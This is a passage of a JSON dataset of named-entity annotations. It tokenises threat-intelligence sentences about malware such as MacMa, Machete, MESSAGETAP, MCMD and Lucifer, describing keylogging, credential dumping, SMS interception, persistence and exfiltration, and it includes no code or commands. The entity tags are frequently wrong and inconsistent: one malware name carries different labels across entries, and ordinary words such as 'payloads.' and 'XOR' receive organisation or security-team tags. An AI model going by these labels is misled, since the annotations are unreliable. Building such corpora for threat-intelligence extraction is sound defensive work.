"the", - "username", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "issue", - "shell", - "commands", - "to", - "download", - "and", - "execute", - "additional", - "payloads." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "use", - "WMI", - "to", - "log", - "into", - "remote", - "machines", - "for", - "propagation." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Lurid", - "can", - "compress", - "data", - "before", - "sending", - "it." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lurid", - "performs", - "XOR", - "encryption." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "has", - "the", - "ability", - "to", - "remove", - "set", - "Registry", - "Keys,", - "including", - "those", - "used", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "has", - "the", - "ability", - "to", - "upload", - "files", - "from", - "an", - "infected", - "device." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "can", - "modify", - "processes", - "to", - "prevent", - "them", - "from", - "being", - "visible", - "on", - "the", - "desktop." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "can", - "upload", - "additional", - "files", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "has", - "been", - "named", - "Readme.txt", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "can", - "Base64", - "encode", - "output", - "strings", - "prior", - "to", - "sending", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "can", - "use", - "Registry", - "Run", - "Keys", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "can", - "use", - "scheduled", - "tasks", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "can", - "use", - "HTTPS", - "in", - "communication", - "with", - "C2", - "web", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MCMD", - "can", - "launch", - "a", - "console", - "process", - "(cmd.exe)", - "with", - "redirected", - "standard", - "input", - "and", - "output." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MESSAGETAP", - "has", - "XOR-encrypted", - "and", - "stored", - "contents", - "of", - "SMS", - "messages", - "that", - "matched", - "its", - "target", - "list." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MESSAGETAP", - "checks", - "two", - "files,", - "keyword_parm.txt", - "and", - "parm.txt,", - "for", - "instructions", - "on", - "how", - "to", - "target", - "and", - "save", - "data", - "parsed", - "and", - "extracted", - "from", - "SMS", - "message", - "data", - "from", - "the", - "network", - "traffic.", - "If", - "an", - "SMS", - "message", - "contained", - "either", - "a", - "phone", - "number,", - "IMSI", - "number,", - "or", - "keyword", - "that", - "matched", - "the", - "predefined", - "list,", - "it", - "is", - "saved", - "to", - "a", - "CSV", - "file", - "for", - "later", - "theft", - "by", - "the", - "threat", - "actor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "checking", - "for", - "the", - "existence", - "of", - "two", - "files,", - "keyword_parm.txt", - "and", - "parm.txt,", - "MESSAGETAP", - "XOR", - "decodes", - "and", - "read", - "the", - "contents", - "of", - "the", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "loaded", - "into", - "memory,", - "MESSAGETAP", - "deletes", - "the", - "keyword_parm.txt", - "and", - "parm.txt", - "configuration", - "files", - "from", - "disk." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MESSAGETAP", - "checks", - "for", - "the", - "existence", - "of", - "two", - "configuration", - "files", - "(keyword_parm.txt", - "and", - "parm.txt)", - "and", - "attempts", - "to", - "read", - "the", - "files", - "every", - "30", - "seconds." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MESSAGETAP", - "stored", - "targeted", - "SMS", - "messages", - "that", - "matched", - "its", - "target", - "list", - "in", - "CSV", - "files", - "on", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MESSAGETAP", - "uses", - "the", - "libpcap", - "library", - "to", - "listen", - "to", - "all", - "traffic", - "and", - "parses", - "network", - "protocols", - "starting", - "with", - "Ethernet", - "and", - "IP", - "layers.", - "It", - "continues", - "parsing", - "protocol", - "layers", - "including", - "SCTP,", - "SCCP,", - "and", - "TCAP", - "and", - "finally", - "extracts", - "SMS", - "message", - "data", - "and", - "routing", - "metadata." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "After", - "loading", - "the", - "keyword", - "and", - "phone", - "data", - "files,", - "MESSAGETAP", - "begins", - "monitoring", - "all", - "network", - "connections", - "to", - "and", - "from", - "the", - "victim", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MURKYTOP", - "has", - "the", - "capability", - "to", - "schedule", - "remote", - "AT", - "jobs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "MURKYTOP", - "has", - "the", - "capability", - "to", - "delete", - "local", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "MURKYTOP", - "has", - "the", - "capability", - "to", - "retrieve", - "information", - "about", - "users", - "on", - "remote", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MURKYTOP", - "has", - "the", - "capability", - "to", - "scan", - "for", - "open", - "ports", - "on", - "hosts", - "in", - "a", - "connected", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MURKYTOP", - "has", - "the", - "capability", - "to", - "retrieve", - "information", - "about", - "shares", - "on", - "remote", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MURKYTOP", - "has", - "the", - "capability", - "to", - "retrieve", - "information", - "about", - "groups." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "MURKYTOP", - "has", - "the", - "capability", - "to", - "identify", - "remote", - "hosts", - "on", - "connected", - "networks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MURKYTOP", - "has", - "the", - "capability", - "to", - "retrieve", - "information", - "about", - "the", - "OS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MURKYTOP", - "uses", - "the", - "command-line", - "interface." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "the", - "ability", - "to", - "record", - "audio." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "clear", - "possible", - "malware", - "traces", - "such", - "as", - "application", - "logs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "collect", - "then", - "exfiltrate", - "files", - "from", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "decrypts", - "a", - "downloaded", - "file", - "using", - "AES-128-EBC", - "with", - "a", - "custom", - "delta." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "used", - "TLS", - "encryption", - "to", - "initialize", - "a", - "custom", - "protocol", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "exfiltrates", - "data", - "from", - "a", - "supplied", - "path", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "delete", - "itself", - "from", - "the", - "compromised", - "computer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "search", - "for", - "a", - "specific", - "file", - "on", - "the", - "compromised", - "computer", - "and", - "can", - "enumerate", - "files", - "in", - "Desktop,", - "Downloads,", - "and", - "Documents", - "folders." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "removed", - "the", - "`com.apple.quarantineattribute`", - "from", - "the", - "dropped", - "file,", - "`$TMPDIR/airportpaird`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "downloaded", - "additional", - "files,", - "including", - "an", - "exploit", - "for", - "used", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "dump", - "credentials", - "from", - "the", - "macOS", - "keychain." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "use", - "Core", - "Graphics", - "Event", - "Taps", - "to", - "intercept", - "user", - "keystrokes", - "from", - "any", - "text", - "input", - "field", - "and", - "saves", - "them", - "to", - "text", - "files.", - "Text", - "input", - "fields", - "include", - "Spotlight,", - "Finder,", - "Safari,", - "Mail,", - "Messages,", - "and", - "other", - "apps", - "that", - "have", - "text", - "fields", - "for", - "passwords." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "installs", - "a", - "`com.apple.softwareupdate.plist`", - "file", - "in", - "the", - "`/LaunchAgents`", - "folder", - "with", - "the", - "`RunAtLoad`", - "value", - "set", - "to", - "`true`.", - "Upon", - "user", - "login,", - "MacMa", - "is", - "executed", - "from", - "`/var/root/.local/softwareupdate`", - "with", - "root", - "privileges.", - "Some", - "variations", - "also", - "include", - "the", - "`LimitLoadToSessionType`", - "key", - "with", - "the", - "value", - "`Aqua`,", - "ensuring", - "the", - "MacMa", - "only", - "runs", - "when", - "there", - "is", - "a", - "logged", - "in", - "GUI", - "user." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "stored", - "collected", - "files", - "locally", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "used", - "macOS", - "API", - "functions", - "to", - "perform", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "used", - "a", - "custom", - "JSON-based", - "protocol", - "for", - "its", - "C&C", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "used", - "TCP", - "port", - "5633", - "for", - "C2", - "Communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "enumerate", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "manage", - "remote", - "screen", - "sessions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "used", - "Apple’s", - "Core", - "Graphic", - "APIs,", - "such", - "as", - "`CGWindowListCreateImageFromArray`,", - "to", - "capture", - "the", - "user's", - "screen", - "and", - "open", - "windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "collect", - "information", - "about", - "a", - "compromised", - "computer,", - "including:", - "Hardware", - "UUID,", - "Mac", - "serial", - "number,", - "macOS", - "version,", - "and", - "disk", - "sizes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "collect", - "IP", - "addresses", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "collect", - "the", - "username", - "from", - "the", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacMa", - "has", - "the", - "capability", - "to", - "create", - "and", - "modify", - "file", - "timestamps." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "MacMa", - "can", - "execute", - "supplied", - "shell", - "commands", - "and", - "uses", - "bash", - "scripts", - "to", - "perform", - "additional", - "actions." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacSpy", - "can", - "record", - "the", - "sounds", - "from", - "microphones", - "on", - "a", - "computer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacSpy", - "can", - "steal", - "clipboard", - "contents." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "MacSpy", - "deletes", - "any", - "temporary", - "files", - "it", - "creates" - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacSpy", - "stores", - "itself", - "in", - "<code>~/Library/.DS_Stores/</code>" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "MacSpy", - "captures", - "keystrokes." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "MacSpy", - "persists", - "via", - "a", - "Launch", - "Agent." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "MacSpy", - "uses", - "Tor", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacSpy", - "can", - "capture", - "screenshots", - "of", - "the", - "desktop", - "over", - "multiple", - "monitors." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MacSpy", - "uses", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "saves", - "the", - "window", - "names." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "stores", - "zipped", - "files", - "with", - "profile", - "data", - "from", - "installed", - "web", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete's", - "collected", - "data", - "is", - "encrypted", - "with", - "AES", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "used", - "TLS-encrypted", - "FTP", - "to", - "exfiltrate", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "captures", - "audio", - "from", - "the", - "computer’s", - "microphone." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete’s", - "collected", - "files", - "are", - "exfiltrated", - "automatically", - "to", - "remote", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "retrieves", - "the", - "user", - "profile", - "data", - "(e.g.,", - "browsers)", - "from", - "Chrome", - "and", - "Firefox", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "hijacks", - "the", - "clipboard", - "data", - "by", - "creating", - "an", - "overlapped", - "window", - "that", - "listens", - "to", - "keyboard", - "events." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "used", - "pyobfuscate,", - "zlib", - "compression,", - "and", - "base64", - "encoding", - "for", - "obfuscation.", - "Machete", - "has", - "also", - "used", - "some", - "visual", - "obfuscation", - "techniques", - "by", - "naming", - "variables", - "as", - "combinations", - "of", - "letters", - "to", - "hinder", - "analysis." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "collects", - "stored", - "credentials", - "from", - "several", - "web", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "searches", - "the", - "File", - "system", - "for", - "files", - "of", - "interest." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "can", - "find,", - "encrypt,", - "and", - "upload", - "files", - "from", - "fixed", - "and", - "removable", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete’s", - "downloaded", - "data", - "is", - "decrypted", - "using", - "AES." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Machete's", - "collected", - "data", - "is", - "exfiltrated", - "over", - "the", - "same", - "channel", - "used", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "a", - "feature", - "to", - "copy", - "files", - "from", - "every", - "drive", - "onto", - "a", - "removable", - "drive", - "in", - "a", - "hidden", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "sent", - "data", - "over", - "HTTP", - "if", - "FTP", - "failed,", - "and", - "has", - "also", - "used", - "a", - "fallback", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Once", - "a", - "file", - "is", - "uploaded,", - "Machete", - "will", - "delete", - "it", - "from", - "the", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "uses", - "FTP", - "for", - "Command", - "&", - "Control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "produces", - "file", - "listings", - "in", - "order", - "to", - "search", - "for", - "files", - "to", - "be", - "exfiltrated." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "the", - "capability", - "to", - "exfiltrate", - "stolen", - "data", - "to", - "a", - "hidden", - "folder", - "on", - "a", - "removable", - "drive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "can", - "download", - "additional", - "files", - "for", - "execution", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "logs", - "keystrokes", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "stores", - "files", - "and", - "logs", - "in", - "a", - "folder", - "on", - "the", - "local", - "drive." - ], - "ner_tags": [ - "B-Idus", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "renamed", - "task", - "names", - "to", - "masquerade", - "as", - "legitimate", - "Google", - "Chrome,", - "Java,", - "Dropbox,", - "Adobe", - "Reader", - "and", - "Python", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "B-Tool", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Machete", - "renamed", - "payloads", - "to", - "masquerade", - "as", - "legitimate", - "Google", - "Chrome,", - "Java,", - "Dropbox,", - "Adobe", - "Reader", - "and", - "Python", - "executables." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "B-Tool", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "detects", - "the", - "insertion", - "of", - "new", - "devices", - "by", - "listening", - "for", - "the", - "WM_DEVICECHANGE", - "window", - "message." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "scanned", - "and", - "looked", - "for", - "cryptographic", - "keys", - "and", - "certificate", - "file", - "extensions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "a", - "component", - "to", - "check", - "for", - "running", - "processes", - "to", - "look", - "for", - "web", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Machete", - "is", - "written", - "in", - "Python", - "and", - "is", - "used", - "in", - "conjunction", - "with", - "additional", - "Python", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "used", - "the", - "startup", - "folder", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "different", - "components", - "of", - "Machete", - "are", - "executed", - "by", - "Windows", - "Task", - "Scheduler." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "sends", - "stolen", - "data", - "to", - "the", - "C2", - "server", - "every", - 